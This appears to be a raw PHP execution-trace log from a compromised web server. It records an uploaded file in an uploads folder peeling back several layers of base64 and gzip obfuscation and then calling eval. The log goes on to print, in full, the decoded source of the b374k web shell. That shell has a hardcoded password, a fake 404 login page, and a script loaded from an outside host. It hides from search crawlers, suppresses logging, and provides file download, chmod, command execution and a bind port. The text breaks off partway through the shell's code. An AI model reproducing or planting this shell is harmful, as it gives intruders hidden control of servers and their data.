3	8	R			'AEiAt38AR4C4fwBCgL1/eJwAQoC9f3ic7P15d+JI0igO/119Tn8HNeMZ7HGVEZttqsruZl8MmH3r7uujDRBowUisM30/+xuRKQmJxQbbNc+d3/tUdxUgZUZGRkbGkhkZ+f3XyXDC/PzTzz8F/smctyWeqQ8lRWH48E1kzEzDAiuGRYZfMUt/ULsJC+a/RanPzRSTmXCG8dXH0KeyrjG+C+afAQB1xs3M4RO+Zu4YX0y4ZbmgxAncdSwmhfrCNR+LRW5Cwf7tDRvmBd83rCLoij7F4n9j2X6fZelTq6knjjZwx/gzsiIZJU7z4/vf4L2sSef+erqYearEGzn/Z+bpKZMvpp+eLrCE3D9nDHM60Y3zs6d6utZK13735xqNylMTfj3Fs+lyw//nZ39W1weK5L9gfrm7Y/qcYkjMBfMvAMDAn6HEidL0nNQLBK9YJsJGmLJuMhl9pol+0hCWk5ayid//QtQMyTAA5yfD5KbmOSnzmzSd6tOnqTTRp6asDc5Z'
3	9	0	0.001575	667320	base64_decode	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code	1	1	'AEiAt38AR4C4fwBCgL1/eJwAQoC9f3ic7P15d+JI0igO/119Tn8HNeMZ7HGVEZttqsruZl8MmH3r7uujDRBowUisM30/+xuRKQmJxQbbNc+d3/tUdxUgZUZGRkbGkhkZ+f3XyXDC/PzTzz8F/smctyWeqQ8lRWH48E1kzEzDAiuGRYZfMUt/ULsJC+a/RanPzRSTmXCG8dXH0KeyrjG+C+afAQB1xs3M4RO+Zu4YX0y4ZbmgxAncdSwmhfrCNR+LRW5Cwf7tDRvmBd83rCLoij7F4n9j2X6fZelTq6knjjZwx/gzsiIZJU7z4/vf4L2sSef+erqYearEGzn/Z+bpKZMvpp+eLrCE3D9nDHM60Y3zs6d6utZK13735xqNylMTfj3Fs+lyw//nZ39W1weK5L9gfrm7Y/qcYkjMBfMvAMDAn6HEidL0nNQLBK9YJsJGmLJuMhl9pol+0hCWk5ayid//QtQMyTAA5yfD5KbmOSnzmzSd6tOnqTTRp6asDc5Z'
3	9	1	0.002002	802520
3	9	R			'\000H��\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2�'
3	10	0	0.003749	667320	gzinflate	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code	1	1	'\000H��\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2�'
3	10	1	0.005540	769752
3	10	R			'\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017�'
3	11	0	0.007293	634552	gzinflate	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code	1	1	'\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017�'
3	11	1	0.009135	736984
3	11	R			'\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<'
3	12	0	0.011213	634552	gzinflate	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code	1	1	'\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<'
3	12	1	0.013032	736984
3	12	R			'x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���'
3	13	0	0.014781	634552	gzuncompress	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code	1	1	'x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���'
3	13	1	0.016656	736984
3	13	R			'x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���*�|���0C:'
3	14	0	0.018451	634552	gzuncompress	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code	1	1	'x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���*�|���0C:'
3	14	1	0.021343	986840
3	14	R			'<?php \r\n\r\n/* (Web Shell b374k r3c0d3d by x\'1n73ct|default pass:" 1n73ction ") */ \r\n$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc"; \r\n$color = "#00ff00"; \r\n$default_action = \'FilesMan\'; \r\n@define(\'SELF_PATH\', __FILE__); \r\nif( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { \r\n    header(\'HTTP/1.0 404 Not Found\'); \r\n    exit; \r\n} \r\n@session_start(); \r\n@error_reporting(0); \r\n@ini_set(\'error_log\',NULL); \r\n@ini_set(\'log_errors\',0); \r\n@ini_set(\'max_executio'
3	15	0	0.026926	1962320	eval	1	'?><?php \r\n\r\n/* (Web Shell b374k r3c0d3d by x\'1n73ct|default pass:" 1n73ction ") */ \r\n$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc"; \r\n$color = "#00ff00"; \r\n$default_action = \'FilesMan\'; \r\n@define(\'SELF_PATH\', __FILE__); \r\nif( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { \r\n    header(\'HTTP/1.0 404 Not Found\'); \r\n    exit; \r\n} \r\n@session_start(); \r\n@error_reporting(0); \r\n@ini_set(\'error_log\',NULL); \r\n@ini_set(\'log_errors\',0); \r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'output_buffering\',0); \r\n@ini_set(\'display_errors\', 0);\r\n@set_time_limit(0); \r\n@set_magic_quotes_runtime(0); \r\n@define(\'VERSION\', \'2.1\'); \r\nif( get_magic_quotes_gpc() ) { \r\n    function stripslashes_array($array) { \r\n        return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array); \r\n    } \r\n    $_POST = stripslashes_array($_POST); \r\n} \r\nfunction printLogin() { \r\n    ?> \r\n<SCRIPT SRC=http://w0rms.com/sayac.js></SCRIPT>\r\n<h1>Not Found</h1> \r\n<p>The requested URL was not found on this server.</p> \r\n<hr> \r\n<address>Apache Server at <?=$_SERVER[\'HTTP_HOST\']?> Port 80</address> \r\n    <style> \r\n        input { margin:0;background-color:#fff;border:1px solid #fff; } \r\n    </style> \r\n    <center> \r\n    <form method=post> \r\n    <input type=password name=pass> \r\n    </form></center> \r\n    <?php \r\n    exit; \r\n} \r\nif( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) \r\n    if( empty( $auth_pass ) || \r\n        ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) \r\n        $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true; \r\n    else \r\n        printLogin();\r\n\t\t\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'output_buffering\',0);\t\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){\r\n\t$file = $_GET[\'dl\'];\r\n\t$filez = @file_get_contents($file);\r\n   header("Content-type: application/octet-stream"); \r\n   header("Content-length: ".strlen($filez)); \r\n   header("Content-disposition: attachment; filename=\\"".basename($file)."\\";");\r\n   echo $filez; \r\n    exit; \r\n}\r\nelseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){\r\n\t$file = $_GET[\'dlgzip\'];\r\n\t$filez = gzencode(@file_get_contents($file));\r\n   header("Content-Type:application/x-gzip\\n"); \r\n   header("Content-length: ".strlen($filez)); \r\n   header("Content-disposition: attachment; filename=\\"".basename($file).".gz\\";");\r\n   echo $filez; \r\n    exit; \r\n}\r\n// view image\r\nif(isset($_GET[\'img\'])){\r\n\t\t@ob_clean(); \r\n\t\t$d = magicboom($_GET[\'y\']);\r\n\t\t$f = $_GET[\'img\'];\r\n\t\t$inf = @getimagesize($d.$f); \r\n   \t\t$ext = explode($f,"."); \r\n   \t\t$ext = $ext[count($ext)-1]; \r\n   \t \t@header("Content-type: ".$inf["mime"]);\r\n   \t \t@header("Cache-control: public"); \r\n  \t\t@header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); \r\n  \t\t@header("Cache-control: max-age=".(60*60*24*7));  \r\n   \t \t@readfile($d.$f); \r\n   \t \texit; \r\n}\r\n\r\n// server software\r\n$software = getenv("SERVER_SOFTWARE");\r\n// check safemode\r\nif (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  $safemode = TRUE; else $safemode = FALSE;\r\n// uname -a\r\n$system = @php_uname();\r\n// mysql\r\nfunction showstat($stat) {if ($stat=="on") {return "<b><font style=\'color:#00FF00\'>ON</font></b>";}else {return "<b><font style=\'color:#DD4736\'>OFF</font></b>";}}\r\nfunction testmysql() {if (function_exists(\'mysql_connect\')) {return showstat("on");}else {return showstat("off");}}\r\nfunction testcurl() {if (function_exists(\'curl_version\')) {return showstat("on");}else {return showstat("off");}}\r\nfunction testwget() {if (exe(\'wget --help\')) {return showstat("on");}else {return showstat("off");}}\r\nfunction testperl() {if (exe(\'perl -h\')) {return showstat("on");}else {return showstat("off");}}\r\n// check os\r\nif(strtolower(substr($system,0,3)) == "win") $win = TRUE;\r\nelse $win = FALSE; \r\n// change directory\r\nif(isset($_GET[\'y\'])){\r\n\tif(@is_dir($_GET[\'view\'])){\r\n\t\t$pwd = $_GET[\'view\'];\r\n\t\t@chdir($pwd);\r\n\t}\r\n\telse{\r\n\t\t$pwd = $_GET[\'y\'];\r\n\t\t@chdir($pwd);\r\n\t}\r\n}\r\n//hdd\r\nfunction convertByte($s) {\r\nif($s >= 1073741824)\r\nreturn sprintf(\'%1.2f\',$s / 1073741824 ).\' GB\';\r\nelseif($s >= 1048576)\r\nreturn sprintf(\'%1.2f\',$s / 1048576 ) .\' MB\';\r\nelseif($s >= 1024)\r\nreturn sprintf(\'%1.2f\',$s / 1024 ) .\' KB\';\r\nelse\r\nreturn $s .\' B\';\r\n}\r\n\r\n// username, id, shell prompt and working directory\r\nif(!$win){\r\n\tif(!$user = rapih(exe("whoami"))) $user = "";\r\n\tif(!$id = rapih(exe("id"))) $id = "";\r\n\t$prompt = $user." \\$ ";\r\n\t$pwd = @getcwd().DIRECTORY_SEPARATOR;\r\n}\r\nelse {\r\n\t$user = @get_current_user();\r\n\t$id = $user;\r\n\t$prompt = $user." &gt;";\r\n\t$pwd = realpath(".")."\\\\";\r\n\t// find drive letters\r\n \t$v = explode("\\\\",$d); \r\n\t$v = $v[0]; \r\n \tforeach (range("A","Z") as $letter) \r\n \t{ \r\n\t  $bool = @is_dir($letter.":\\\\");\r\n\t  if ($bool) \r\n\t  { \r\n \t\t  $letters .= "<a href=\\"?y=".$letter.":\\\\\\">[ ";\r\n\t\t   if ($letter.":" != $v) {$letters .= $letter;} \r\n\t\t   else {$letters .= "<span class=\\"gaya\\">".$letter."</span>";} \r\n\t\t   $letters .= " ]</a> "; \r\n  \t  }\t \r\n } \r\n}\r\n\r\nfunction testoracle() {\r\n    if (function_exists(\'ocilogon\')) { return showstat("on"); }\r\n    else { return showstat("off"); }\r\n    }\r\n\r\nfunction testmssql() {\r\n    if (function_exists(\'mssql_connect\')) { return showstat("on"); }\r\n    else { return showstat("off"); }\r\n    }\r\n\r\n function showdisablefunctions() {\r\n    if ($disablefunc=@ini_get("disable_functions")){ return "<span style=\'color:\'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }\r\n    else { return "<span style=\'color:#00FF1E\'><b>NONE</b></span>"; }\r\n    }\r\n\t\r\nif(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;\r\nelse $posix = FALSE;\r\n// server ip\r\n$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);\r\n// your ip ;-)\r\n$my_ip = $_SERVER[\'REMOTE_ADDR\'];\r\n$admin_id=$_SERVER[\'SERVER_ADMIN\'];\r\n$bindport = "13123";\r\n$bindport_pass = "b374k";\r\n\r\n// separate the working direcotory\r\n$pwds = explode(DIRECTORY_SEPARATOR,$pwd);\r\n$pwdurl = "";\r\nfor($i = 0 ; $i < sizeof($pwds)-1 ; $i++){\r\n\t$pathz = "";\r\n\tfor($j = 0 ; $j <= $i ; $j++){\r\n\t\t$pathz .= $pwds[$j].DIRECTORY_SEPARATOR;\r\n\t}\r\n\t$pwdurl .= "<a href=\\"?y=".$pathz."\\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";\r\n}\r\n\t\r\n// rename file or folder\r\nif(isset($_POST[\'rename\'])){\r\n\t$old = $_POST[\'oldname\'];\r\n\t$new = $_POST[\'newname\'];\r\n\t@rename($pwd.$old,$pwd.$new);\r\n\t$file = $pwd.$new;\r\n}\r\nif(isset($_POST[\'chmod\'])){ \r\n\t$name = $_POST[\'name\'];\r\n\t$value = $_POST[\'newvalue\'];\r\nif (strlen($value)==3){\r\n\t$value = 0 . "" . $value;}\r\n\t@chmod($pwd.$name,octdec($value));\r\n\t$file = $pwd.$name;}\r\n\t\r\nif(isset($_POST[\'chmod_folder\'])){\r\n\t$name = $_POST[\'name\'];\r\n\t$value = $_POST[\'newvalue\'];\r\nif (strlen($value)==3){\r\n\t$value = 0 . "" . $value;}\r\n\t@chmod($pwd.$name,octdec($value));\r\n\t$file = $pwd.$name;}\r\n\r\n\r\n// print useful info\r\n$buff  = "Software : <b>".$software."</b><br />";\r\n$buff .= "System OS : <b>".$system."</b><br />";\r\nif($id != "") $buff .= "ID : <b>".$id."</b><br />";\r\n$buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />";\r\n$buff .= "Server ip : <b>".$server_ip."</b> <span class=\\"gaya\\"> | </span> Your   ip : <b>".$my_ip."</b><span class=\\"gaya\\"> | </span> Admin : <b>".$admin_id."</b><br />";\r\n$buff .= "Free Disk: "."<span style=\'color:#00FF1E\'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";\r\nif($safemode) $buff .= "Safemode: <span class=\\"gaya\\"><b>ON</b></span><br />";\r\nelse $buff .= "Safemode: <span class=\\"gaya\\"><b>OFF</b></span><br />";\r\n$buff .= "Disabled Functions: ".showdisablefunctions()."<br />";\r\n$buff .= "MySQL: ".testmysql()."&nbsp;|&nbsp;MSSQL: ".testmssql()."&nbsp;|&nbsp;Oracle: ".testoracle()."&nbsp;|&nbsp;Perl: ".testperl()."&nbsp;|&nbsp;cURL: ".testcurl()."&nbsp;|&nbsp;WGet: ".testwget()."<br>";\r\n$buff .= "<font color=00ff00 ><b>".$letters."&nbsp;&gt;&nbsp;".$pwdurl."</b></font>";\r\n\r\n\r\n\r\n\r\nfunction rapih($text){\r\n\treturn trim(str_replace("<br />","",$text));\r\n}\r\n\r\nfunction magicboom($text){\r\n\tif (!get_magic_quotes_gpc()) {\r\n   \t\t return $text;\r\n\t} \r\n\treturn stripslashes($text);\r\n}\r\n\r\nfunction showdir($pwd,$prompt){\r\n\t$fname = array();\r\n\t$dname = array();\r\n\tif(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;\r\n\telse $posix = FALSE;\r\n\t$user = "????:????";\r\n\tif($dh = @scandir($pwd)){\r\n\t\tforeach($dh as $file){\r\n\t\t\tif(is_dir($file)){\r\n\t\t\t\t$dname[] = $file;\r\n\t\t\t}\r\n\t\t\telseif(is_file($file)){\r\n\t\t\t\t$fname[] = $file;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\telse{\r\n\t\tif($dh = @opendir($pwd)){\r\n\t\t\twhile($file = @readdir($dh)){\r\n\t\t\t\tif(@is_dir($file)){\r\n\t\t\t\t\t$dname[] = $file;\r\n\t\t\t\t}\r\n\t\t\t\telseif(@is_file($file)){\r\n\t\t\t\t\t$fname[] = $file;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t@closedir($dh);\r\n\t\t}\r\n\t}\r\n\r\n\t\r\n\tsort($fname);\r\n\tsort($dname);\r\n\t$path = @explode(DIRECTORY_SEPARATOR,$pwd);\r\n\t$tree = @sizeof($path);\r\n\t$parent = "";\r\n\t$buff = "\r\n\t<form action=\\"?y=".$pwd."&amp;x=shell\\" method=\\"post\\" style=\\"margin:8px 0 0 0;\\">\r\n\t<table class=\\"cmdbox\\" style=\\"width:50%;\\">\r\n\t<tr><td><b>$prompt</b></td><td><input onMouseOver=\\"this.focus();\\" id=\\"cmd\\" class=\\"inputz\\" type=\\"text\\" name=\\"cmd\\" style=\\"width:400px;\\" value=\\"\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr>\r\n\t</form>\r\n\t<form action=\\"?\\" method=\\"get\\" style=\\"margin:8px 0 0 0;\\">\r\n\t<input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" />\r\n\t<tr><td><b>view file/folder</b></td><td><input onMouseOver=\\"this.focus();\\" id=\\"goto\\" class=\\"inputz\\" type=\\"text\\" name=\\"view\\" style=\\"width:400px;\\" value=\\"".$pwd."\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"View !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr>\r\n\t</form></table><table class=\\"explore\\">\r\n\t<tr><th>name</th><th style=\\"width:80px;\\">size</th><th style=\\"width:210px;\\">owner:group</th><th style=\\"width:80px;\\">perms</th><th style=\\"width:110px;\\">modified</th><th style=\\"width:190px;\\">actions</th></tr>\r\n\t";\r\n\tif($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;\r\n\telse $parent = $pwd;  \r\n\r\n\tforeach($dname as $folder){\r\n\t\tif($folder == ".") {\r\n\t\t\tif(!$win && $posix){\r\n\t\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$owner = $user;\r\n\t\t\t}\r\n\t\t\t$buff .= "<tr><td><a href=\\"?y=".$pwd."\\">$folder</a></td><td>LINK</td>\r\n\t\t\t<td style=\\"text-align:center;\\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>\r\n\t\t\t<td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\\"titik1\\">\r\n\t\t\t<a href=\\"?y=$pwd&amp;edit=".$pwd."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik1\',\'titik1_form\');\\">newfolder</a></span>\r\n\t\t\t<form action=\\"?\\" method=\\"get\\" id=\\"titik1_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t\t<input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" />\r\n\t\t\t<input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" />\r\n\t\t\t</form></td>\r\n\t\t\t\r\n\t\t\t</tr>\r\n\t\t\t";\r\n\t\t}\r\n\t\telseif($folder == "..") {\r\n\t\t\tif(!$win && $posix){\r\n\t\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$owner = $user;\r\n\t\t\t}\r\n\t\t\t$buff .= "<tr><td><a href=\\"?y=".$parent."\\"><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC\'>   $folder</a></td><td>LINK</td>\r\n\t\t\t<td style=\\"text-align:center;\\">".$owner."</td>\r\n\t\t\t<td><center>".get_perms($parent)."</center></td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($parent))."</td>\r\n\t\t\t<td><span id=\\"titik2\\"><a href=\\"?y=$pwd&amp;edit=".$parent."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik2\',\'titik2_form\');\\">newfolder</a></span>\r\n\t\t\t<form action=\\"?\\" method=\\"get\\" id=\\"titik2_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t\t<input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" />\r\n\t\t\t<input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" />\r\n\t\t\t</form>\r\n\t\t\t</td></tr>";\r\n\t\t}\r\n\t\telse {\r\n\t\t\tif(!$win && $posix){\r\n\t\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$owner = $user;\r\n\t\t\t}\r\n\t\t\t$buff .= "<tr><td><a id=\\"".clearspace($folder)."_link\\" href=\\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\\"><b><img 